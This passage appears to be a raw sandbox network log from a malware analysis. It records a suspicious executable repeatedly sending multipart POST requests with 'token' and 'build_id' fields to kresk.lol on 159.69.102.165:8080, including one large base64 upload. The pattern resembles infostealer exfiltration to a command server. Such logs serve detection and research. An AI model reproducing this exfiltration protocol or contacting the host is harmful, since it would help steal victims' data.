                                                                                                                                                                      2024-12-04 16:05:25 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----R90RQ9HL6P8YU3ECJMOP
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1837
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:25 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------R90RQ9HL6P8YU3ECJMOPCont
                                                                                                                                                                      2024-12-04 16:05:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:26 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      33192.168.2.449842159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:26 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----R90RQ9HL6P8YU3ECJMOP
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1837
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:26 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------R90RQ9HL6P8YU3ECJMOPCont
                                                                                                                                                                      2024-12-04 16:05:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:27 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      34192.168.2.449846159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:28 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----X4WTRQIMYUSJM7YMOHDT
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1837
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:28 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 58 34 57 54 52 51 49 4d 59 55 53 4a 4d 37 59 4d 4f 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 58 34 57 54 52 51 49 4d 59 55 53 4a 4d 37 59 4d 4f 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 58 34 57 54 52 51 49 4d 59 55 53 4a 4d 37 59 4d 4f 48 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------X4WTRQIMYUSJM7YMOHDTContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------X4WTRQIMYUSJM7YMOHDTContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------X4WTRQIMYUSJM7YMOHDTCont
                                                                                                                                                                      2024-12-04 16:05:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:29 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      35192.168.2.449849159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:29 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AASR9H47QQ9ZUASRQ90H
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 453
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:29 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------AASR9H47QQ9ZUASRQ90HContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------AASR9H47QQ9ZUASRQ90HContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------AASR9H47QQ9ZUASRQ90HCont
                                                                                                                                                                      2024-12-04 16:05:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:30 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      36192.168.2.449856159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:32 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----VA16PHVSJEKNYMGDTRIE
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 98813
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------VA16PHVSJEKNYMGDTRIECont
                                                                                                                                                                      2024-12-04 16:05:32 UTC16355OUTData Raw: 69 69 6b 41 6c 46 4c 52 69 67 42 4b 53 6c 70 4b 42 68 51 61 4b 4b 59 78 4b 4b 57 69 6b 41 6c 46 4c 69 6b 6f 41 53 69 6c 70 4b 42 69 55 55 74 4a 51 4d 4b 53 6c 70 44 51 41 55 6c 4c 52 54 41 53 6b 4e 4c 52 51 4e 43 55 47 69 6a 46 41 78 4b 4b 57 6b 6f 41 4b 53 6c 70 4b 59 78 4b 51 30 36 6b 6f 47 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79
                                                                                                                                                                      Data Ascii: iikAlFLRigBKSlpKBhQaKKYxKKWikAlFLikoASilpKBiUUtJQMKSlpDQAUlLRTASkNLRQNCUGijFAxKKWkoAKSlpKYxKQ06koGJRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDy
                                                                                                                                                                      2024-12-04 16:05:32 UTC16355OUTData Raw: 6a 4b 6b 73 4b 38 47 33 70 65 36 39 65 71 2b 66 39 62 6e 4a 5a 72 6f 66 42 45 38 73 58 69 2b 78 45 52 2b 2b 7a 49 77 39 56 4b 6e 50 2b 50 34 55 79 62 77 50 34 6a 68 6e 38 72 2b 7a 6e 66 6e 41 64 48 55 71 66 78 7a 78 2b 4e 64 4e 34 65 30 4f 50 77 72 4f 62 6e 55 4a 59 6e 31 5a 34 7a 35 4e 74 47 64 33 6c 4b 65 72 4e 2f 4c 2f 48 74 39 62 6d 4f 59 59 61 6a 68 5a 7a 6c 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 49 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 79 61 35 2f 77 41 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 41 49 59 2b 6f 34 68 6e 47 6c 6c 6c 54 6d 36 70 4c 35 33 52 68 55 6e 4e 4c 52 58 37 57 66 6b 59 55 55 55 55 41 65 72 4d
                                                                                                                                                                      Data Ascii: jKksK8G3pe69eq+f9bnJZrofBE8sXi+xER++zIw9VKnP+P4UybwP4jhn8r+znfnAdHUqfxzx+NdN4e0OPwrObnUJYn1Z4z5NtGd3lKerN/L/Ht9bmOYYajhZzlJNWZnhcNWlWirW1NK6CpeTIv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyTya5/wARzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/AIY+o4hnGlllTm6pL53RhUnNLRX7WfkYUUUUAerM
                                                                                                                                                                      2024-12-04 16:05:32 UTC16355OUTData Raw: 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 38 41 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 43 69 75 74 74 50 42 61 33 56 6c 42 63 66 32 6b 71 65 62 47 72 37 66 4a 4a 78 6b 5a 78 31 71 4f 66 77 76 70 6c 72 4d 30 4e 78 34 6d 73 49 5a 56 78 6d 4f 55 71 72 44 49 79 4d 67 74 6e 6f 61 38 65 4f 62 78 6b 37 4b 44 5a 39 46 4c 68 79 70 46 58 64 52 49 35 61 69 75 6c 2f 34 52 2f 52 66 2b 68 73 30 76 38 41 37 2b 4a 2f 38 58 56 79 30 38 45 51 58 38 52 6c 73 39 63 74 72 69 4d
                                                                                                                                                                      Data Ascii: GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P8ASkPTNH+eaO1Io9AooorA+UCiuttPBa3VlBcf2kqebGr7fJJxkZx1qOfwvplrM0Nx4msIZVxmOUqrDIyMgtnoa8eObxk7KDZ9FLhypFXdRI5aiul/4R/Rf+hs0v8A7+J/8XVy08EQX8Rls9ctriM
                                                                                                                                                                      2024-12-04 16:05:32 UTC16355OUTData Raw: 4a 52 53 55 55 44 46 4e 4a 51 54 52 6d 6d 67 51 6c 4c 53 41 34 6f 6f 41 4b 4f 4b 43 61 54 4e 4d 70 43 68 6d 51 2f 4b 78 58 36 4e 55 79 58 6c 79 68 2b 57 5a 2f 78 4f 61 72 6b 30 6d 61 4f 57 34 47 67 75 71 33 53 39 53 6a 66 56 61 6c 58 57 50 2b 65 6c 72 47 33 75 4b 79 69 61 54 4e 48 73 6f 73 4f 55 32 30 31 4f 78 59 2f 50 42 4b 76 2b 36 32 61 73 4a 63 36 5a 4a 2f 79 38 76 47 66 39 74 4b 35 6f 79 4b 74 4e 4d 2f 6f 4b 6c 30 46 33 44 32 62 65 78 31 79 77 32 38 68 78 44 66 51 48 32 4c 59 71 39 61 32 54 32 36 7a 79 4d 36 46 66 4a 62 42 56 75 2b 4b 38 2b 65 59 35 70 71 33 4d 79 5a 32 79 4f 75 65 4d 41 31 6c 4f 68 4a 71 79 6b 4e 34 65 54 57 34 32 54 37 78 36 56 48 39 61 64 6e 4f 50 53 6d 6e 30 2f 57 75 69 35 31 70 61 43 45 38 55 68 2f 47 6a 70 33 6f 70 46 49 62 51
                                                                                                                                                                      Data Ascii: JRSUUDFNJQTRmmgQlLSA4ooAKOKCaTNMpChmQ/KxX6NUyXlyh+WZ/xOark0maOW4Gguq3S9SjfValXWP+elrG3uKyiaTNHsosOU201OxY/PBKv+62asJc6ZJ/y8vGf9tK5oyKtNM/oKl0F3D2bex1yw28hxDfQH2LYq9a2T26zyM6FfJbBVu+K8+eY5pq3MyZ2yOueMA1lOhJqykN4eTW42T7x6VH9adnOPSmn0/Wui51paCE8Uh/Gjp3opFIbQ
                                                                                                                                                                      2024-12-04 16:05:32 UTC16355OUTData Raw: 6f 41 53 67 39 4b 4f 67 70 4d 2b 39 42 51 6c 47 61 4b 4d 66 57 67 41 2b 74 4a 31 37 30 76 57 6b 79 42 53 47 49 61 44 36 55 48 69 6b 70 6a 44 6a 48 2b 46 42 36 43 6a 70 51 63 55 44 45 36 30 6d 4f 32 4d 30 37 76 36 55 6c 41 43 48 6d 6a 72 52 6e 6b 69 69 67 59 67 36 30 55 76 66 33 70 50 70 31 6f 41 51 30 55 55 48 72 51 4d 39 45 6f 6f 6f 72 4d 2b 52 4e 2f 77 64 2f 79 48 6c 2f 36 35 74 2f 53 76 52 59 6b 6a 4c 62 54 45 68 4a 50 6f 4b 38 36 38 48 66 38 68 35 66 2b 75 62 66 30 72 30 49 74 49 76 7a 51 6f 73 6b 67 2b 36 72 4e 74 42 50 31 77 63 56 38 50 6e 30 6d 73 77 6a 62 73 76 7a 5a 39 2f 77 32 76 39 67 66 71 2f 79 51 39 37 58 35 2b 49 59 69 44 2f 44 79 68 2f 4d 5a 71 74 63 61 62 42 71 4d 45 31 6a 63 43 53 4c 63 42 39 78 73 35 48 42 79 43 52 36 2b 31 50 47 71 6c
                                                                                                                                                                      Data Ascii: oASg9KOgpM+9BQlGaKMfWgA+tJ170vWkyBSGIaD6UHikpjDjH+FB6CjpQcUDE60mO2M07v6UlACHmjrRnkiigYg60Uvf3pPp1oAQ0UUHrQM9EooorM+RN/wd/yHl/65t/SvRYkjLbTEhJPoK868Hf8h5f+ubf0r0ItIvzQoskg+6rNtBP1wcV8Pn0mswjbsvzZ9/w2v9gfq/yQ97X5+IYiD/Dyh/MZqtcabBqME1jcCSLcB9xs5HByCR6+1PGql
                                                                                                                                                                      2024-12-04 16:05:32 UTC683OUTData Raw: 37 77 58 6b 64 78 4b 6c 30 72 2b 59 4a 6c 63 68 77 2b 63 37 67 65 75 63 39 36 56 68 33 4f 7a 30 54 55 37 33 51 39 48 76 72 71 39 76 5a 49 39 49 6e 46 7a 44 62 36 65 50 75 33 30 7a 4c 74 4a 5a 52 77 56 54 63 70 4c 4e 30 77 41 75 54 6e 44 6f 56 31 58 54 59 64 49 30 50 52 72 72 37 48 65 72 41 2b 70 58 31 79 47 32 2f 5a 39 36 63 4d 57 47 53 75 79 48 42 79 4f 66 6e 59 44 6b 38 38 7a 5a 2b 4a 2f 45 47 6e 32 76 32 57 79 31 7a 55 72 65 32 79 54 35 4d 56 30 36 70 7a 31 2b 55 48 48 50 66 31 71 4e 66 45 47 73 52 36 76 4e 71 73 4f 70 58 55 46 2f 4d 54 76 75 4c 65 55 78 4d 63 39 52 38 75 4d 44 70 77 4f 4f 42 52 59 4c 6e 70 30 47 75 7a 58 5a 6a 31 4c 51 5a 37 69 53 34 6d 31 71 79 73 4c 69 35 32 6c 5a 4c 79 4e 59 63 5a 6b 48 63 53 4d 47 4a 42 36 34 47 65 52 57 58 66 53
                                                                                                                                                                      Data Ascii: 7wXkdxKl0r+YJlchw+c7geuc96Vh3Oz0TU73Q9Hvrq9vZI9InFzDb6ePu30zLtJZRwVTcpLN0wAuTnDoV1XTYdI0PRrr7HerA+pX1yG2/Z96cMWGSuyHByOfnYDk88zZ+J/EGn2v2Wy1zUre2yT5MV06pz1+UHHPf1qNfEGsR6vNqsOpXUF/MTvuLeUxMc9R8uMDpwOOBRYLnp0GuzXZj1LQZ7iS4m1qysLi52lZLyNYcZkHcSMGJB64GeRWXfS
                                                                                                                                                                      2024-12-04 16:05:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:34 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      37192.168.2.449864159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:36 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BS2D2V3W4EUAAIWBIWT2
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------BS2D2V3W4EUAAIWBIWT2Cont
                                                                                                                                                                      2024-12-04 16:05:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:36 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      38192.168.2.449871159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:38 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----T0HDJE3EC2VAIM7GLNO8
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
